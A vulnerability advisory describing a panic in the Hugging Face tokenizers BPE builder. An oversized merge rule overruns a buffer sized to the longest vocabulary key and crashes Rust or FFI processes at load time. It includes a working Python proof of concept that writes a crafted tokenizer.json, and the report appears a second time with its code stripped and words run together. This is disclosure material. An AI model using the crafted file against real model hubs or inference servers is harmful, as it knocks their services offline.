Summary
Loading an untrusted tokenizer.json panics the BPE model builder and, in Rust and FFI embeddings, aborts the entire process. The builder sizes a scratch buffer to the longest vocabulary key, then writes the concatenation of each merge rule into it. A merge whose concatenated token is longer than any vocabulary key overruns the buffer, which Rust turns into a panic. Every Hugging Face model ships a tokenizer.json and they are downloaded and shared, so loading one is a common, deliberate action.
Details
In tokenizers/src/models/bpe/model.rs, BpeBuilder::build:
let mut buffer: Vec<u8> = vec![0; max_len]; // line 251: max_len = byte length of the LONGEST vocab key
...
buffer[0..a.len()].copy_from_slice(a.as_bytes()); // line 264
let b_len = b.len() - prefix_len;
let merge_len = a.len() + b_len;
buffer[a.len()..merge_len].copy_from_slice(&b.as_bytes()[prefix_len..]); // line 267: panics when merge_len > max_len
buffer is sized to max_len, the longest vocab key. For each merge rule (a, b) the code writes the concatenation a + b[prefix_len..], of length merge_len = a.len() + b.len() - prefix_len, into that buffer. When the concatenated merge token is longer than any vocab key, the slice index is out of bounds and Rust panics. The code already has a graceful error path for out-of-vocabulary merge tokens (Error::MergeTokenOutOfVocabulary, exercised by the test test_bpe_from_file_merge_token_oov), but the buffer write happens before that check, so this case aborts instead of returning the intended error. A secondary defect at the same site: with continuing_subword_prefix set and a merge whose b.len() < prefix_len, b_len underflows (usize), which panics in debug and corrupts merge_len in release.
Sink path: Tokenizer.from_file / from_str deserializes the BPE model (bpe/serialization.rs), calls BpeBuilder::vocab_and_merges, then build, reaching line 267. This is pure load time, no encoding needed. No existing advisory describes the max_len buffer overrun.
PoC
pip install tokenizers
python poc_bpe_panic.py
poc_bpe_panic.py:
import os, json
from tokenizers import Tokenizer
# vocab's longest key is length 2 ("aa","bb"); merge ["aa","bb"] -> "aabb" (len 4) > max_len (2),
# overrunning the merge buffer at bpe/model.rs:267 during LOAD.
malicious = {
"version": "1.0", "truncation": None, "padding": None,
"added_tokens": [], "normalizer": None, "pre_tokenizer": None,
"post_processor": None, "decoder": None,
"model": {
"type": "BPE", "dropout": None, "unk_token": None,
"continuing_subword_prefix": None, "end_of_word_suffix": None,
"fuse_unk": False, "byte_fallback": False, "ignore_merges": False,
"vocab": {"aa": 0, "bb": 1},
"merges": [["aa", "bb"]],
},
}
p = os.path.expanduser("~/poc_tokenizer.json")
open(p, "w").write(json.dumps(malicious))
Tokenizer.from_file(p) # panics: range end index 4 out of range for slice of length 2
Observed (tokenizers 0.23.1): thread '<unnamed>' panicked at .../bpe/model.rs:267:23: range end index 4 out of range for slice of length 2, surfacing in the Python binding as pyo3_runtime.PanicException (exit 1), instantly from a tiny input.
Impact
A trivially crafted tokenizer.json causes a denial of service when loaded. In the Python binding the panic surfaces as a catchable exception, but in pure-Rust consumers and FFI embeddings of the tokenizers crate (where panics are not unwound, or panic = "abort" is set, common in release builds) it aborts the entire process. Any service that loads model-supplied tokenizer files (model hubs, inference servers, automated model loaders) is exposed.
Summary
Loading an untrusted tokenizer.json panics the BPE model builder and, in Rust and FFI embeddings, aborts the entire process. The builder sizes a scratch buffer to the longest vocabulary key, then writes the concatenation of each merge rule into it. A merge whose concatenated token is longer than any vocabulary key overruns the buffer, which Rust turns into a panic. Every Hugging Face model ships a tokenizer.json and they are downloaded and shared, so loading one is a common, deliberate action.
Details
In
tokenizers/src/models/bpe/model.rs,BpeBuilder::build:bufferis sized tomax_len, the longest vocab key. For each merge rule (a, b) the code writes the concatenation a + b[prefix_len..], of lengthmerge_len = a.len() + b.len() - prefix_len, into that buffer. When the concatenated merge token is longer than any vocab key, the slice index is out of bounds and Rust panics. The code already has a graceful error path for out-of-vocabulary merge tokens (Error::MergeTokenOutOfVocabulary, exercised by the testtest_bpe_from_file_merge_token_oov), but the buffer write happens before that check, so this case aborts instead of returning the intended error. A secondary defect at the same site: withcontinuing_subword_prefixset and a merge whoseb.len() < prefix_len,b_lenunderflows (usize), which panics in debug and corruptsmerge_lenin release.Sink path:
Tokenizer.from_file/from_strdeserializes the BPE model (bpe/serialization.rs), callsBpeBuilder::vocab_and_merges, thenbuild, reaching line 267. This is pure load time, no encoding needed. No existing advisory describes the max_len buffer overrun.PoC
poc_bpe_panic.py:Observed (tokenizers 0.23.1):
thread '<unnamed>' panicked at .../bpe/model.rs:267:23: range end index 4 out of range for slice of length 2, surfacing in the Python binding aspyo3_runtime.PanicException(exit 1), instantly from a tiny input.Impact
A trivially crafted tokenizer.json causes a denial of service when loaded. In the Python binding the panic surfaces as a catchable exception, but in pure-Rust consumers and FFI embeddings of the tokenizers crate (where panics are not unwound, or
panic = "abort"is set, common in release builds) it aborts the entire process. Any service that loads model-supplied tokenizer files (model hubs, inference servers, automated model loaders) is exposed.